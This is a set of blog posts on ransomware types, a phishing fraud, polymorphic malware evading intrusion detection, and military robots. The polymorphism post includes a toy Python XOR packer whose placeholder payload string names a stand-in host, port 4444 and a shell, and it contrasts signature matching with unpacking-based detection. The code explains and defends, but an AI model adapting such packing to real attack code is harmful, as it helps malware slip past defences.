Ransomware is malicious software that prevents a user from accessing the files and folders they have stored on their computer, and sometimes the whole machine itself. It does so by encrypting the files and folders present on the system or the master boot record of the hard drive. Ransomware then asks the user to pay money to its perpetrators, mostly in Bitcoin, if they want back access to any of the locked files, folders or the locked computer. Depending on the strain, the malware pops up a dialogue box providing a deadline for the payment, a Bitcoin wallet address, and a scary message intended to frighten victims into paying, for fear of losing all their valuable data. However, even if the victims send the money to the threat actors, there is no guarantee that their data will be decrypted, and if the data does not get decrypted, the monetary loss is even greater. Therefore, paying the ransom is always a risk. The attackers use Bitcoin because Bitcoin addresses cannot be tracked by law enforcement agencies, making it easier for the criminals to cover their tracks and escape being caught. In this type of attack, the adversaries mimic the real-world situation of taking hostages and asking for ransom, using ransomware crimeware. The files become the hostages, as they get encrypted without the victims having the decryption keys.
If the attack is on a company that has no backup of its data, the company faces the dilemma of whether or not to pay the ransom so that the attackers will send them the decryption key or decrypt their data for them. These attacks can be tremendously destructive, and ransomware has been considered the most dangerous cyber threat in the world. Multiple ransomware strains are present in the wild. Some of the main categories are encryption ransomware, lock screen ransomware, Master Boot Record (MBR) ransomware, ransomware encrypting web servers, and mobile device ransomware.
Encryption ransomware uses advanced encryption to encrypt files and folders and shows a pop-up dialogue box asking for a ransom if the user wants to gain access to their files ever again. An example of this type of ransomware is CryptoLocker. Lock screen ransomware does not encrypt anything; instead, it prevents access to the computer by displaying a full-screen message that cannot be closed and stops the user from doing anything on their computer. It asks the user for a ransom if they want access to their machine. An example of this type is WinLocker. Master Boot Record (MBR) ransomware alters the MBR of the computer's hard drive, which the computer uses for booting up and loading the operating system, and hence makes the system unbootable. When the user tries to turn on the machine, it displays a message demanding a ransom. An example is the Petya ransomware, which modifies the MBR and encrypts the Master File Table (MFT) on the computer's hard drive. Ransomware encrypting web servers exploits known vulnerabilities in web servers to get in and encrypt the files stored there. It is highly targeted malware. An example is Linux.Encoder.1, which targets web servers based on the Linux OS. It uses a robust encryption algorithm to encrypt files that have particular extensions and are present in specific directories. Mobile device ransomware is used by attackers mostly to attack mobile devices running the Android OS. It performs its activities in the same way as encryption ransomware, the only difference being that it operates on a mobile device. One example of this strain is Pletor. It mainly infects devices that have been used to visit bogus porn sites, by posing as a media player, encrypting files with specific extensions and then asking for a ransom to unlock the data. It displays messages in Russian and has more than 30 different versions.
One of the most notable ransomware attacks in the world was the one that targeted the National Health Service (NHS), the world's largest single-payer healthcare system. The ransomware attack affected 61 NHS organisations across the United Kingdom (UK) and disrupted GP and hospital appointments. The organisations were not able to access patient records, ambulances were diverted, and many surgeries were interrupted as well. People were advised to take precautions and use NHS services with care. The ransomware strain used was Wanna Decryptor, and the cyber-criminals asked for the ransom in Bitcoin. The work of many medical centres was made nearly impossible by the ransomware. The results of such an attack are felt hardest by the patients using these medical services, as it just adds to the suffering they are already undergoing. It could be even worse if patient records were fully compromised, as doctors would not be able to access critical life-saving information about patients, such as allergies, ongoing medications, etc. So, measures should be taken to protect the network and its systems against this barbaric malware. Keeping backups is a great precautionary measure.
One of the most damaging social engineering attacks was suffered by Ubiquiti Networks in 2015, when attackers sent phishing emails to the company's accounting department. The emails purported to be from a subsidiary of the company and contained instructions about changes to various payments and payments to be made to multiple overseas accounts, which the employees believed belonged to legitimate entities the company was dealing with. The employees blindly followed those instructions without confirming or verifying whether the emails actually came from the company's subsidiary. The employees thought the money went to genuine entities, but in reality it went to the attackers' accounts, allowing the threat actors to steal $47 million from the company, of which only $8 million was ever recovered.
Social engineering attacks are the cause of a massive number of security breaches around the globe. Therefore, people should protect themselves against such attacks to every extent they can.


15

March, 2019

Polymorphism and evading an IDS and IPS

Alert! It's a virus. Alert! It's a trojan! Oh no! It looks like our IDS is busted; this malware got into our network somehow, but how?! There exist various techniques that threat actors can use to fool an organisation's security controls and compromise its network infrastructure. One of these is using polymorphism to evade the Intrusion Detection Systems set up by a company to detect malicious activity on its network.... This blog post is all about how the use of polymorphism is snowballing among adversaries and how this technique is used to inject malware into a target company's network without the malware being detected.
Malware is essentially software created and used to perform malicious activities on a network or the systems present on that network. It is malicious code written with the intent to compromise critical systems and eventually steal highly sensitive information or destroy the compromised systems altogether. Many organisations use a defence-in-depth approach when choosing security controls to integrate into their network infrastructure to protect the sensitive information contained in their systems. One such device, used widely across the surface of the giant round rock that we all live on, is the Intrusion Detection System, or IDS. Companies deploy it in their networks behind a firewall, and it offers threat detection controls that are very useful for knowing whether any malicious activity is happening on the company's network. The information provided by an IDS can be used to devise the actions that should be taken if an anomaly is detected on the network.
The main types of IDS devices that are used in the IT industry are, namely, protocol-based IDS, signature-based IDS, network traffic pattern based IDS, anomaly-based IDS, and stack-based IDS. A protocol-based IDS is usually installed on a web server, and it sits between the web server being protected and the devices that connect to that server. It monitors and analyses the protocols being used in the communication between the web server and the connecting devices, and checks the state and behaviour of the protocol being used to detect any malicious activity. It enforces the correct use of the protocol being used. A signature-based IDS works by analysing series of bytes that it receives and matching their fingerprints with the fingerprints that it has stored in its database, and then tries to figure out whether the fingerprint matches some malicious code or not and acts accordingly. A network traffic pattern based IDS analyses the network traffic and compares the pattern with a baseline pattern and alerts if there is any diversion in the traffic from the baseline. An anomaly-based IDS detects whether the systems are diverting from their baseline operations and alerts if they do diverge from that baseline. However, it is more prone to a high false-positive rate and can also be fooled by a very well-orchestrated attack. Stack-based IDS integrates itself very closely with the TCP/IP protocol stack and watches the packet as it traverses up the network protocol stack layer by layer and monitors the network data packets before the packet reaches the operating system or the application for processing. However, all these IDS devices cannot block all malicious activity and can be fooled.
One technique that fools a signature-based IDS quite easily is polymorphism. Threat actors use it to write malicious code that changes its own appearance each time it propagates or is rebuilt while still doing exactly what it was written to do. Typically the attack code is kept encrypted inside the file and paired with a small decryptor stub; for each new copy the encryption key and the decryptor's instructions are regenerated, so the bytes of the file, and therefore its signature, differ from variant to variant even though the code that eventually runs is identical. A signature-based IDS that learned one variant will not match the next one, so even if a lot of people in a company download the same piece of malware, the IDS sees a different fingerprint each time and lets it through. This is how polymorphism evades even state-of-the-art signature-based Intrusion Detection Systems. Worms, viruses and trojans can all be made polymorphic. Polymorphic shellcode can also be written for buffer-overflow exploits against the services and applications on a company's network, so that the encoded payload carried in the exploit does not match the network signatures written for well-known shellcode. Polymorphic malware tries to blend in with normal network traffic, and that is why organisations struggle to protect themselves against it.
An Intrusion Prevention System (IPS) is a device placed in-line with the packet stream, so unlike an IDS it can actually drop a malicious packet instead of only alerting on it. First-generation IPS devices relied on signature-based prevention and were therefore ineffective against attacks that leveraged polymorphism. Next-generation IPSs inspect packets using content, context, application and user awareness, and can also catch the parts of an attack that polymorphism does not hide, such as the command-and-control connection the malware opens once it is running. Hence, if your organisation is still running first-generation IPSs, it is time to upgrade to next-generation ones.
It follows that Artificial Intelligence (AI), machine learning and heuristics are the approaches that can stop polymorphic malware from taking hold, because they look at what a file does rather than what it looks like: they observe events on the network and on the hosts, such as a file modifying itself or decrypting code into memory, and decide from that behaviour whether a particular executable is malware. However, these approaches consume a lot of computing resources, so whether they are feasible depends on the environment, whether small, medium or large scale. In very large environments there is a great deal to check before malicious activity can be confirmed, so the inspection overhead and the false positives that analysts must triage become significant, and a careless deployment can slow down the business; such solutions have to be sized and tuned for the environment rather than switched on everywhere at once.
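To make the mechanism from the paragraphs above concrete, here is an added example that is not part of the original post. It is a toy model, written for this page: the "payload" is a harmless constructed byte string standing in for attack code, and the packer is a deliberately simple XOR scheme with a random key and a random-length junk prefix, which mimics how a polymorphic engine keeps the body encrypted and varies the decryptor so that no fixed byte sequence survives from one variant to the next. It then runs two detectors over a batch of variants: a pure signature match on the bytes, which catches none of them, and a detector that unpacks the sample first and compares the decoded body, which is the "look at what it does, not what it looks like" idea behind the heuristic and behavioural approaches discussed above. All names and the sample payload are assumptions made for the example.

```python
"""Toy model of polymorphic malware versus a signature-based IDS (added example)."""
import hashlib
import random

# Constructed stand-in for the attack code that every variant must still run.
PAYLOAD = b"[constructed payload] connect 203.0.113.10:4444; spawn shell"
# A signature-based IDS stores a fixed byte pattern taken from a known sample.
SIGNATURE = PAYLOAD[:16]
# A detector that unpacks first can key on the hash of the decoded body instead.
KNOWN_BAD_SHA256 = hashlib.sha256(PAYLOAD).hexdigest()


def mutate(payload: bytes, seed=None) -> bytes:
    """Produce one variant laid out as: junk_len | junk | key | xor(payload, key).

    A real polymorphic engine also rewrites the decryptor's instructions; here the
    variable-length junk prefix and the random key stand in for that variation.
    """
    rng = random.Random(seed)
    key = rng.randrange(1, 256)                 # never 0, which would leave bytes unchanged
    junk = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 16)))
    body = bytes(b ^ key for b in payload)
    return bytes([len(junk)]) + junk + bytes([key]) + body


def unpack(variant: bytes) -> bytes:
    """The decoder stub's job: skip the junk, read the key, decrypt the body."""
    junk_len = variant[0]
    key = variant[1 + junk_len]
    body = variant[2 + junk_len:]
    return bytes(b ^ key for b in body)


def signature_match(data: bytes, signature: bytes = SIGNATURE) -> bool:
    """What a pure signature engine does: look for the fixed byte pattern."""
    return signature in data


def unpacked_match(variant: bytes, known_bad: str = KNOWN_BAD_SHA256) -> bool:
    """What an engine that emulates or unpacks does: compare the decoded body."""
    return hashlib.sha256(unpack(variant)).hexdigest() == known_bad


def evaluate(n: int = 20, seed: int = 0) -> dict:
    """Generate n variants of the same payload and count what each strategy catches."""
    rng = random.Random(seed)
    variants = [mutate(PAYLOAD, rng.randrange(2 ** 32)) for _ in range(n)]
    return {
        "variants": n,
        "distinct_variants": len(set(variants)),
        "caught_by_signature": sum(signature_match(v) for v in variants),
        "caught_after_unpack": sum(unpacked_match(v) for v in variants),
    }


if __name__ == "__main__":
    print("original sample matches signature:", signature_match(PAYLOAD))
    print(evaluate())
```

Every variant decodes to the same payload, so the behaviour is constant while the bytes on the wire never repeat; that is exactly the gap between "fingerprint the file" and "observe what the file does". The unpacking detector here cheats by knowing the toy format; real products get the same effect by emulating the sample in a sandbox or by watching the unchanged behaviour afterwards, such as the outbound connection the payload makes.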
So, beware the next time you download the same thing that someone you know did the other day because you never know what that file might really be!

14

March, 2019

Machines in a hostile environment

It's the rise of the machines in 2019, and it's not the smart television, the smartphone or the smart assistant that turns your lights on and off that we are talking about. We are talking about industrial robots, which are evolving rapidly and being used for various applications all around the planet we live on. In this blog, we discuss what these industrial robots actually are and how they can be, and are being, used for tactical purposes in hostile situations, such as deploying weapons of mass destruction. Don't worry, there won't be a robot throwing a bomb near you or shooting a missile at you any time soon, as these lethal humanoids are still in their testing phase.
... These industrial tactical robots are not your typical robots that clean the floor at the press of a button or read bedtime stories to your children. These machines are designed to withstand hostile situations, bombings, shootouts, heavy artillery fire, you name it, and to go into that situation and take control of it. A lot of research and development has gone into this type of robot, and many of them are being deployed by organisations such as the military for security, surveillance, defence, intelligence collection and inspection. This means that robots are not just tin cans anymore; they can be, and are being, used to do things that human beings could never do on their own.
Today there are drones that can be controlled remotely, flown to remote, hostile locations and used to send back video of that location for intelligence collection, or to help the military pick targets on which missiles can be launched from far away. What if a situation arises in which a bomb has to be planted in a remote location where no human can even think of setting foot, or where it is too dangerous to send in troops? If soldiers are sent anyway, they risk their lives to serve the purpose. To avoid that, one might think of sending in aircraft to do the bombing, but what if it is too dangerous to send in aircraft as well? This is where tactical robots come in handy. Because they are built from materials that withstand high heat, pressure, force and stress, are less prone to damage and are not living creatures, these robots could be the best option for deploying a weapon of mass destruction. They could be carried or air-dropped near the remote location that humans cannot reach, then remotely driven to the hostile target undetected, made to send back video, and finally made to plant a bomb at the site or fire missiles at targets. As a result, the bloodshed of a country's troops could be prevented and a vast number of lives saved.
The technology already exists, and many companies are leveraging it to venture into manufacturing tactical robots and are already putting them on the market. But the industrial robots that exist today can only be controlled from a very short distance, and that puts the people controlling them at risk. The manufacturers, along with many others, could collaborate and take the initiative to create such machines and offer them to militaries for use on the battlefield. But not everyone thinks of the benefit of society as a whole. Not all companies are willing to take part in collaborative efforts; driven by the greed to earn more and more money and to beat their competition, they selfishly ignore the benefits their collective effort could bring to their country's defensive lines. They simply refuse to collaborate with their competitors in order to be the best in a capitalist environment. They do not even think about how many lives their efforts could save, and instead keep their focus on making that extra buck.
One wonders what kind of senseless beings they are.